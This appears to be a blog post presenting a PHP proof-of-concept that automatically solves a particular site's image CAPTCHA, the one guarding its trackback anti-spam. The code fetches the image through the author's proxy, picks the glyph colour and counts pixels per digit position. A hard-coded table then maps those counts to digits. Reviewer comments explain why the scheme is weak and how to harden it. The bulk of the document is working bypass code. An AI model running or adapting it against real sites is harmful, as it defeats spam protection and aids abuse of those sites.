CAPTCHA Exploit ovvero, byebye trackback antispam
Wikipedia - "A CAPTCHA (IPA: /ˈkæptʃə/) is a type of challenge-response test used in computing to determine whether the user is human. "CAPTCHA" is a contrived acronym for "Completely Automated Public Turing test to tell Computers and Humans Apart", trademarked by Carnegie Mellon University. A CAPTCHA involves one computer (a server) which asks a user to complete a test. While the computer is able to generate and grade the test, it is not able to solve the test on its own. Because computers are unable to solve the CAPTCHA, any user entering a correct solution is presumed to be human. The term CAPTCHA was coined in 2000 by Luis von Ahn, Manuel Blum, Nicholas J. Hopper (all of Carnegie Mellon University), and John Langford (then of IBM). A common type of CAPTCHA requires that the user type the letters of a distorted image, sometimes with the addition of an obscured sequence of letters or digits that appears on the screen."
POC: http://g-brain.sesoyo.com/captchapwn.php
Crediti: http://g-brain.sesoyo.com/
Source Code:
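<?php
# Input stage of the proof of concept: download one challenge image, store it
# beside the script as x.gif, show it to the viewer, and open it with GD so the
# code that follows can read individual pixels.
#
# NOTE(review): the image is requested through the author's proxy script; the
# q parameter appears to be an encoded upstream URL - not verified here.
# The response body is remote, untrusted data. It is written to a fixed file
# name in the script's working directory, so concurrent requests overwrite
# each other's x.gif.
$out = fopen("x.gif", 'w');
if ($out === false) {
    exit("Unable to open x.gif for writing\n");
}

$payload = file_get_contents("http://g-brain.sesoyo.com/proxy/index.php?q=aHR0cDovL3d3dy52bGllZ2VydmFyaW5nZW4uY29tL25sL2dkY2hlY2sucGhw");
if ($payload === false) {
    fclose($out);
    exit("Unable to download the challenge image\n");
}
fwrite($out, $payload);
fclose($out);
echo "<img src='x.gif' alt='CAPTCHA'/><br />\n";

# GD returns false when the bytes are not a readable GIF; stop here instead of
# handing false to imagecolorat() further down.
$gif = imagecreatefromgif("x.gif");
if ($gif === false) {
    exit("x.gif is not a readable GIF image\n");
}
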
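# Count color frequency
#
# For a palette image such as a GIF, imagecolorat() returns the palette index
# of the pixel. Only indices 58..63 are tallied; presumably the challenge draws
# its digits in one of them (the generator is not shown here). The scan covers
# x = 0..99 and y = 0..37, i.e. it assumes an image of at least 100x38 pixels.
#
# The tallies start at 0 so that an index which never occurs does not trigger
# undefined-variable notices in the page output.
$paletteTally = array(58 => 0, 59 => 0, 60 => 0, 61 => 0, 62 => 0, 63 => 0);
for ($y = 0; $y <= 37; $y++) {
    for ($x = 0; $x <= 99; $x++) {
        $index = imagecolorat($gif, $x, $y);
        if (isset($paletteTally[$index])) {
            $paletteTally[$index]++;
        }
    }
}

# Use most frequent color as font color
#
# NOTE(review): $color is both the threshold and the result. After the first
# hit it holds a palette index, so every later tally is compared with that
# index rather than with the best tally seen so far. With a single non-zero
# tally the outcome is the same; the selection logic is kept as the author
# wrote it.
$color = 0;
foreach ($paletteTally as $index => $current) {
    if ($current > $color) {
        $color = $index;
    }
}

# Why this step is cheap: separating glyph pixels from background is a single
# equality test, because (as far as the code shows) the glyph colour is one
# palette index that nothing else in the image uses.
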
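# Count occurrences of the font color in the digit spaces.
#
# Each digit is assumed to sit in a fixed column window (inclusive x range)
# within rows 0..27. $counts ends up holding one ink-pixel total per digit
# position, in left-to-right order. Totals start at 0 so an empty window
# yields 0 rather than an undefined variable.
$n = 0;
$digitWindows = array(
    array(15, 31),
    array(36, 50),
    array(51, 67),
    array(69, 86),
);
$counts = array(0, 0, 0, 0);

for ($y = 0; $y <= 27; $y++) {
    foreach ($digitWindows as $slot => $window) {
        for ($x = $window[0]; $x <= $window[1]; $x++) {
            if (imagecolorat($gif, $x, $y) == $color) {
                $counts[$slot]++;
            }
        }
    }
}
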
# Font color frequency per digit, as recorded by the author
# (ink-pixel counts observed for each digit at each of the four positions):
#
#   digit   One   Two        Three         Four
#   0       -     62,63      76,77         77,78
#   1       74    74,75      74,75         74
#   2       58    56,57      58,59         58,59
#   3       63    62         63            63
#   4       92    84         92            92
#   5       79    78,79      79            79
#   6       66    65,66      65,66,67,68   66,67,68
#   7       62    58         62            62
#   8       80    80,81      80,81,82      80,81
#   9       71    70,71,72   70,71,72,73   71,72,73
#
# The lookup below is what the code actually applies (position => count =>
# digit). It differs from the notes in a few cells: position Two maps 62 to 3
# only, position Four accepts 75..78 for 0 and 65..68 for 6, and position One
# has no entry for 0 (the author left a disabled line for counts 62/63, which
# are already taken by 7 and 3 in that position).
#
# Defender's reading: the lookup can only work if every digit is drawn with the
# same glyph at the same place each time, so the amount of ink in a column
# window is enough to name the digit and no shape recognition is involved.
# Varying font, scale, rotation and placement, overlapping the glyphs, or
# adding clutter in the glyph colour removes that fingerprint. Expiring each
# challenge after one use and rate-limiting attempts on the server limits
# automated guessing independently of how the image is drawn.
$digitByCount = array(
    1 => array(
        74 => 1,
        58 => 2,
        63 => 3,
        92 => 4,
        79 => 5,
        66 => 6,
        62 => 7,
        80 => 8,
        71 => 9,
    ),
    2 => array(
        63 => 0,
        74 => 1, 75 => 1,
        56 => 2, 57 => 2,
        62 => 3,
        84 => 4,
        78 => 5, 79 => 5,
        65 => 6, 66 => 6,
        58 => 7,
        80 => 8, 81 => 8,
        70 => 9, 71 => 9, 72 => 9,
    ),
    3 => array(
        76 => 0, 77 => 0,
        74 => 1, 75 => 1,
        58 => 2, 59 => 2,
        63 => 3,
        92 => 4,
        79 => 5,
        65 => 6, 66 => 6, 67 => 6, 68 => 6,
        62 => 7,
        80 => 8, 81 => 8, 82 => 8,
        70 => 9, 71 => 9, 72 => 9, 73 => 9,
    ),
    4 => array(
        75 => 0, 76 => 0, 77 => 0, 78 => 0,
        74 => 1,
        58 => 2, 59 => 2,
        63 => 3,
        92 => 4,
        79 => 5,
        65 => 6, 66 => 6, 67 => 6, 68 => 6,
        62 => 7,
        80 => 8, 81 => 8,
        71 => 9, 72 => 9, 73 => 9,
    ),
);

# Walk the per-position totals in order; $n is the 1-based digit position.
# A total with no entry (or a position beyond the fourth) prints the debug
# block instead of a digit.
$n = 0;
foreach ($counts as $c) {
    $n++;
    if ($c !== null && isset($digitByCount[$n][$c])) {
        echo $digitByCount[$n][$c];
    } else {
        echo "<br />\nDEBUG:<br />\nColor: $color<br />\nCount: $c<br />\nNumber: $n<br />\n";
    }
}
echo "\n";
?>